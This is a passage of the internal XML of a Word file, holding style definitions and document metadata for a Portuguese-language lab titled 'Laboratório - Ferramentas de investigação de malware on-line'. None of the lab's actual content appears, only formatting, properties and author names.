    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="360"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableAnswer">
    <w:name w:val="Table Answer"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextL50AnswerChar">
    <w:name w:val="Body Text L50 Answer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyTextL50Answer"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BodyTextL50Answer">
    <w:name w:val="Body Text L50 Answer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextL50AnswerChar"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextL25AnswerChar">
    <w:name w:val="Body Text L25 Answer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyTextL25Answer"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BodyTextL25Answer">
    <w:name w:val="Body Text L25 Answer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextL25AnswerChar"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="360"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msochpdefault">
    <w:name w:val="msochpdefault"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PlaceholderText">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="LabTitleInstVersred">
    <w:name w:val="Lab Title Inst Vers (red)"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="EE0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Gray">
    <w:name w:val="Heading 1 Gray"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DevConfigGray">
    <w:name w:val="DevConfig Gray"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
      <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2GrayDnT">
    <w:name w:val="Heading 2 Gray DnT"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AnswerGray">
    <w:name w:val="Answer Gray"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
      <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DnTbold">
    <w:name w:val="DnT bold"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DnTnobold">
    <w:name w:val="DnT no bold"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>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customStyle="1" w:styleId="rynqvb">
    <w:name w:val="rynqvb"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DB5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3147</Words>
  <Characters>17476</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>145</Lines>
  <Paragraphs>41</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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Laboratório - Ferramentas de investigação de malware on-line</dc:title>
  <dc:subject/>
  <dc:creator>Shubham Shinde (aptlogica)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Neha Ghodke (aptlogica)</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-03T05:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-05T10:20:00Z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Rodrigo Floriano (rofloria)</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Order">
    <vt:lpwstr>131600.000000000</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="xd_ProgID">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="_ExtendedDescription">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="SharedWithUsers">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="display_urn:schemas-microsoft-com:office:office#Author">
    <vt:lpwstr>Rodrigo Floriano (rofloria)</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="ComplianceAssetId">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="TemplateUrl">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="ContentTypeId">
    <vt:lpwstr>0x010100198F9F34832A35489A19D5E200F54CC8</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MediaLengthInSeconds">
    <vt:lpwstr/>
  </property>
</Properties>
</file>